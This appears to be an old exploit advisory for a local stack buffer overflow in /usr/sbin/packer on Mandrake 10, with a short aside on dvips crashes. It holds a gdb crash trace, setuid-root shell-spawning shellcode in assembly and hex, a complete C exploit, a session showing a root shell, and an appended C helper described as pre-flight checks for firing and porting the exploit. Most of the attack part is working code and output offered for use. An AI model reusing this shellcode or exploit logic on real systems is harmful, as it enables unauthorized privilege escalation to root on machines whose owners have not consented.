Author : Ph03n1X
email  : king_purba@yahoo.co.uk
site   : http://gombong.6te.net/ http://indonesiahack.com

I have found a local stack overflow in /usr/sbin/packer on my Mandrake 10 box.
This overflow can be used to gain root privileges if /usr/sbin/packer is a
suid file (by default this file is not set suid :( ).

An argument of 2000 bytes is enough to crash the program under gdb:

kolor:\>gdb /usr/sbin/packer
GNU gdb 6.0-2mdk (Mandrake Linux)
Copyright 2003 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux-gnu"...(no debugging symbols found)...
Using host libthread_db library "/lib/tls/libthread_db.so.1".

(gdb) run `perl -e 'print "A"x2000'`
Starting program: /usr/sbin/packer `perl -e 'print "A"x2000'`
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x4009fd49 in _IO_file_fopen () from /lib/tls/libc.so.6
(gdb) i r
eax            0x0              0
ecx            0x41414141       1094795585
edx            0x804a008        134520840
ebx            0x40177800       1075279872
esp            0xbfffdb30       0xbfffdb30
ebp            0xbfffdb8c       0xbfffdb8c
esi            0x804a008        134520840
edi            0xbfffe7f0       -1073747984
eip            0x4009fd49       0x4009fd49
eflags         0x10246          66118
cs             0x73             115
ss             0x7b             123
ds             0x7b             123
es             0x7b             123
fs             0x0              0
gs             0x33             51

Note that at the crash point eip is still inside libc's _IO_file_fopen and the
0x41414141 value sits in ecx, so this trace shows attacker-controlled bytes
reaching the fopen() path rather than a direct return-address overwrite. The
PoC does not depend on that crash site: it fills the whole 2000-byte argument
with the predicted address of the shellcode (placed in the environment, near
the top of the stack), so that whichever stack slot packer ends up using holds
that address.

The following code is a PoC for this hole (packer1.c):

/* Shellcode using setuid(0) and execve() /bin/bash

[SECTION .text]
global _start
_start:
    xor eax,eax
    mov al,23           ; setuid(0)
    xor ebx,ebx
    int 0x80
    jmp short ender
starter:
    pop ebx             ; ebx -> '/bin/bashXAAAABBBB'
    xor eax,eax
    mov [ebx+9],al      ; 'X' -> NUL, terminates "/bin/bash"
    mov [ebx+10],ebx    ; AAAA -> pointer to "/bin/bash" (argv[0])
    mov [ebx+14],eax    ; BBBB -> NULL (argv terminator, also used as envp)
    mov al,11           ; execve
    lea ecx,[ebx+10]    ; argv
    lea edx,[ebx+14]    ; envp
    int 0x80
ender:
    call starter        ; pushes the address of the string below
    db '/bin/bashXAAAABBBB'

Tested On mandrake 10 kernel 2.6.3-7mdk */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\xeb\x16\x5b"\
"\x31\xc0\x88\x43\x09\x89\x5b\x0a\x89\x43\x0e"\
"\xb0\x0b\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8"\
"\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61"\
"\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";

int main(int argc, char *argv[])
{
    /* The shellcode is passed as the only environment string, so it ends
       up at the top of the stack of the new process. */
    char *env[2] = {shellcode, NULL};
    int i;
    long ret, *addr_ptr;     /* long is 4 bytes on the i386 target */
    char *buffer, *ptr;

    buffer = malloc(2000);
    /* Predict where envp[0] lands: stack top minus the shellcode string
       and the program path, which the kernel stores just above it. */
    ret = 0xbffffffa - strlen(shellcode) - strlen("/usr/sbin/packer");
    ptr = buffer;
    addr_ptr = (long *) ptr;
    /* Fill the whole argument with that address. */
    for(i=0; i < 2000; i+=4) {
        *(addr_ptr++) = ret;
    }
    buffer[2000-1] = 0;
    execle("/usr/sbin/packer", "/usr/sbin/packer", buffer, (char *)0, env);
    free(buffer);
    return 0;
}

Session on the test box (the file had been made suid root by hand here):

kolor:\>uname -a
Linux wasyucuk 2.6.3-7mdk #1 Wed Mar 17 15:56:42 CET 2004 i686 unknown unknown GNU/Linux
kolor:\>ls -l /usr/sbin/packer
-rwsr-xr-x    1 root     root         3592 Jul 18  2003 /usr/sbin/packer*
kolor:\>wget http://gombong.6te.net/tutorial/packerxplo.txt -O packer1.c
kolor:\>gcc -o packer1 packer1.c
kolor:\>./packer1
³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿
³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿÿ¿
³ÿÿ¿³ÿÿ¿³ÿÿ¿³ÿ
[root@wasyucuk sikolor]#id
uid=0(root) gid=506(sikolor)
groups=506(sikolor),10(wheel)
[root@wasyucuk latihan]#

(The "³ÿÿ¿" pattern packer prints back is the little-endian byte sequence
b3 ff ff bf of the address 0xbfffffb3 = 0xbffffffa - 55 - 16 that the PoC
repeats over its argument.)

Fix:
I did not create any patch for this bug :)
Do not set /usr/sbin/packer SUID or SGID.

Note:
A local buffer overflow was also found in other files, like /usr/bin/dvips
and /usr/bin/odvips. A "segmentation fault" happens when the input to that
file is 1047 bytes or more:

kolor:\>/usr/bin/dvips `perl -e 'print "A"x1047'`
This is dvips(k) 5.92b Copyright 2002 Radical Eye Software (www.radicaleye.com)
/usr/bin/dvips: ! DVI file can't be opened.
Segmentation fault
kolor:\>/usr/bin/dvips `perl -e 'print "A"x120000'`
Segmentation fault
kolor:\>

Greetz : zhainal, no-profile, all crew indonesiahack, nightlogin
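The following is an added example and not part of the original advisory or of the author's PoC. It performs the pre-flight checks a practitioner would run before firing packer1.c: it recomputes the return address with the PoC's own formula (0xbffffffa minus the shellcode length minus the length of "/usr/sbin/packer"; that anchor and path are taken from the PoC and are specific to the author's 2.6.3-7mdk i386 box), checks that neither that address nor the shellcode contains a NUL byte (both travel as NUL-terminated argv/envp strings, so a NUL would truncate them), and resolves the jmp/call pair inside the shellcode to confirm that the jmp-call-pop trick lands on the instructions the NASM comment says it does. The function names are this example's own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Shellcode bytes copied from the PoC: setuid(0), then execve("/bin/bash"). */
static const unsigned char shellcode[] =
    "\x31\xc0\xb0\x17\x31\xdb\xcd\x80\xeb\x16\x5b"
    "\x31\xc0\x88\x43\x09\x89\x5b\x0a\x89\x43\x0e"
    "\xb0\x0b\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8"
    "\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61"
    "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)   /* 55 bytes, without the C terminator */

/* Stack-top anchor hard-coded in the PoC (assumption carried over from it). */
#define STACK_TOP 0xbffffffaUL

/* The PoC's guess for &envp[0]: the kernel stores the program path and the
 * environment strings at the very top of the stack, so the shellcode string
 * starts at STACK_TOP - strlen(shellcode) - strlen(path). */
uint32_t predict_env_addr(const char *progpath, size_t sc_len)
{
    return (uint32_t)(STACK_TOP - sc_len - strlen(progpath));
}

/* argv strings are NUL-terminated: a 0x00 byte anywhere in the address would
 * cut the 2000-byte buffer short at that point. */
int addr_has_nul(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* Same constraint for the shellcode, which travels as an environment string. */
int shellcode_has_nul(const unsigned char *sc, size_t len)
{
    return memchr(sc, 0, len) != NULL;
}

/* Target of a two-byte "jmp short rel8" at offset off, or -1 if not a jmp. */
long jmp_short_target(const unsigned char *sc, size_t off)
{
    if (sc[off] != 0xeb)
        return -1;
    return (long)(off + 2) + (int8_t)sc[off + 1];
}

/* Target of a five-byte "call rel32" at offset off, or -1 if not a call. */
long call_rel32_target(const unsigned char *sc, size_t off)
{
    if (sc[off] != 0xe8)
        return -1;
    uint32_t disp = (uint32_t)sc[off + 1] | ((uint32_t)sc[off + 2] << 8) |
                    ((uint32_t)sc[off + 3] << 16) | ((uint32_t)sc[off + 4] << 24);
    return (long)(off + 5) + (int32_t)disp;
}

/* Build the argument the way the PoC does: the address repeated little-endian
 * over the whole buffer, last byte zeroed as the string terminator.
 * Returns the number of 4-byte copies written. */
size_t fill_with_addr(unsigned char *buf, size_t len, uint32_t addr)
{
    size_t n = 0;
    for (size_t i = 0; i + 4 <= len; i += 4, n++) {
        buf[i]     = (unsigned char)(addr & 0xff);
        buf[i + 1] = (unsigned char)((addr >> 8) & 0xff);
        buf[i + 2] = (unsigned char)((addr >> 16) & 0xff);
        buf[i + 3] = (unsigned char)((addr >> 24) & 0xff);
    }
    buf[len - 1] = 0;
    return n;
}

int main(void)
{
    static unsigned char buf[2000];
    uint32_t ret = predict_env_addr("/usr/sbin/packer", SHELLCODE_LEN);

    printf("predicted shellcode address: 0x%08x (NUL byte: %s)\n",
           ret, addr_has_nul(ret) ? "yes, unusable" : "no");
    printf("shellcode length %zu, contains NUL: %s\n",
           SHELLCODE_LEN, shellcode_has_nul(shellcode, SHELLCODE_LEN) ? "yes" : "no");
    printf("jmp short at 8 -> %ld (the call at 32)\n", jmp_short_target(shellcode, 8));
    printf("call at 32 -> %ld (the pop ebx at 10); string at 37: '%.9s'\n",
           call_rel32_target(shellcode, 32), (const char *)shellcode + 37);
    printf("buffer holds %zu copies, first bytes %02x %02x %02x %02x\n",
           fill_with_addr(buf, sizeof buf, ret), buf[0], buf[1], buf[2], buf[3]);
    return 0;
}
```

The address check is the one that matters most when porting the PoC: 0xbfffffb3 happens to be NUL-free, but a different program path or a longer shellcode can shift the predicted address onto a value with a zero byte, and the argument would then stop at that byte instead of filling the stack.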